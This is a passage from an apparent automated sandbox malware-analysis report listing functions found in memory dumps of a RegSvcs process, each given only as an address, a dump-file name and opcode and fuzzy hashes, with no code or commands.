                          • Instruction Fuzzy Hash: CE21EDB5900219AFDB00CF9AD984A8EFBB4FB49310F10812AE918B7240D374A944CBA4
                          Function 06B03110 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 260783db3e8656a4fc83dd0c801efebe28b373bf2820a66a0fbaeec365631bf2
                          • Instruction ID: df79342f9bcb1a347fa4c67632bec194c3b3026f9e92266d470b62c82e4b5236
                          • Opcode Fuzzy Hash: 260783db3e8656a4fc83dd0c801efebe28b373bf2820a66a0fbaeec365631bf2
                          • Instruction Fuzzy Hash: 14016175E002299BEB54DB79C8445DEFFF5EBC9310F1485AAD506E7240DE309A40CBA0
                          Function 02E2D03F Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2662141537.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2e2d000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction ID: 4d8cf47471e91336d95dd9ffa32842053618ab00706e7e853bf60caa3a9974c6
                          • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction Fuzzy Hash: 30119075544244DFCB15CF10D9C4B16BB62FB44318F28C6A9D94A4B6A6C33AD84ACF61
                          Function 06B03C60 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02f9bd9aa5144ef26f72ac9fe864d33ab68837539ca034dbb54668670590dbac
                          • Instruction ID: 6aaea721b88e4c0d8cdb794c3c1114db4f65dbce5c0a9bb20bab6d16a8b14ff3
                          • Opcode Fuzzy Hash: 02f9bd9aa5144ef26f72ac9fe864d33ab68837539ca034dbb54668670590dbac
                          • Instruction Fuzzy Hash: 5A01F236B101254BDF989A689D287EF3BEBEBC9351F05413AD806E7380EE24CC1247E1
                          Function 06B0F1F1 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d378c5ff248ac25cbf12356b75616d781c2551b7914d6dff4ebcb3c39ac4c3a
                          • Instruction ID: f0b3a363b33cb61b4f1694c5fa187aec40f424c1a967e82a2bdc96ca7e92048e
                          • Opcode Fuzzy Hash: 9d378c5ff248ac25cbf12356b75616d781c2551b7914d6dff4ebcb3c39ac4c3a
                          • Instruction Fuzzy Hash: 8801F179B001414BDB259A7CD45072AAFDAEBC9710F1488ADF50AC7382DA20DC024780
                          Function 06B03930 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aaa8a6260e7061ef968762064a8050ed916a76509febb299d5e9235b0351b5e5
                          • Instruction ID: d51b4b74de0b178cc922258ab982fd4e2759cff0351c920406e71402f0a7a701
                          • Opcode Fuzzy Hash: aaa8a6260e7061ef968762064a8050ed916a76509febb299d5e9235b0351b5e5
                          • Instruction Fuzzy Hash: A911CFB5D01259AFDB00DF9AD884ACEFFF8FB49310F10816AE918A7240D374A944CFA5
                          Function 06B042C0 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b897690e7b9edd9fd1e8fb618a29c73af7f3b91170d4144b1613bb7fbb3c91ce
                          • Instruction ID: 8d82b3939e950de3c65572fc5a7074a91315b05d6d878b8ce9efec21f5ac3f68
                          • Opcode Fuzzy Hash: b897690e7b9edd9fd1e8fb618a29c73af7f3b91170d4144b1613bb7fbb3c91ce
                          • Instruction Fuzzy Hash: 9D01D171B101104BEB6595ADD85072FBFDADBC9720F20987DE20AC7392EE25EC020391
                          Function 06B0F200 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fc20c403bd38e08a41ee1838efe249ca39f9abc0957b783b77b487bcc9d3c55
                          • Instruction ID: 99682e2ca6aff5c0e2081d46d6f5e94872c644b24464f8baaf72810ef0698866
                          • Opcode Fuzzy Hash: 1fc20c403bd38e08a41ee1838efe249ca39f9abc0957b783b77b487bcc9d3c55
                          • Instruction Fuzzy Hash: 9C01AD75B101144BEB65996DD45073BBBDAE7C9710F10887DF90AC7381DE25DC024791
                          Function 06B0A380 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 053c6fec2a57b2d6bd4d8ff2fca433605220a96576b0cedb3cd7852f99235278
                          • Instruction ID: 521e2ed538a11403115b911ec7f413a8fcc7ae7e792e976b5278c0e2fa60fc74
                          • Opcode Fuzzy Hash: 053c6fec2a57b2d6bd4d8ff2fca433605220a96576b0cedb3cd7852f99235278
                          • Instruction Fuzzy Hash: 40018175B102144BEB64EA6CE854B2FBBD6DB89710F10887DE50AD7392DE39EC028780
                          Function 06B0C830 Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f1623acb3638b9940310c141edac3c0f4e9cce12eec0ac43e659f084544f402
                          • Instruction ID: f0b38d416fe3b81a2c57ebd83311c9c6f3610a716d30e4e0afa616928e3e7ba6
                          • Opcode Fuzzy Hash: 0f1623acb3638b9940310c141edac3c0f4e9cce12eec0ac43e659f084544f402
                          • Instruction Fuzzy Hash: EEF02B31B203249BDB9499A4EC006DA7F35EB84294F100138ED01FB3C1D7359C02CBC0
                          Function 06B0C840 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4a38d402650b8b5f38c74ae4174e8cf5b3ec5fe3268b87bffc69f1bd928e4a3
                          • Instruction ID: 54c60fd1fcb7f024742ac174c0eb161c8a01df75ab60e5d331a725a11c1bcc79
                          • Opcode Fuzzy Hash: a4a38d402650b8b5f38c74ae4174e8cf5b3ec5fe3268b87bffc69f1bd928e4a3
                          • Instruction Fuzzy Hash: EBF0A772E212689BEB549965DC049DABF39E784254F104579ED11F7384DB756C01CBC0
                          Function 06B064D9 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39826d8a269504630e9304b5c0bb6b7bf7ffd123302c054139d38a4581b44ce9
                          • Instruction ID: b60329deb84ac31c76159f460eabdddb2db4afa6ae05ba0877c98f6e05346c98
                          • Opcode Fuzzy Hash: 39826d8a269504630e9304b5c0bb6b7bf7ffd123302c054139d38a4581b44ce9
                          • Instruction Fuzzy Hash: 36E048F1E292499BFF90CBB487453597FB5EF42214F2449E9C444D7182E176CE118741
                          Function 06B064E8 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 792587521a662a8972fb7f4186630decc3702f0c058c1e208358ca1e81fdb9fc
                          • Instruction ID: 1a0b5689a9d11f5bd8bba7ee238312c5c888f3105877967fed62ae2d549c5dbc
                          • Opcode Fuzzy Hash: 792587521a662a8972fb7f4186630decc3702f0c058c1e208358ca1e81fdb9fc
                          • Instruction Fuzzy Hash: B6E0ECB1E1410DABFF50DEB5894575A7FADEB01214F2089E5D509C7281F176DE118790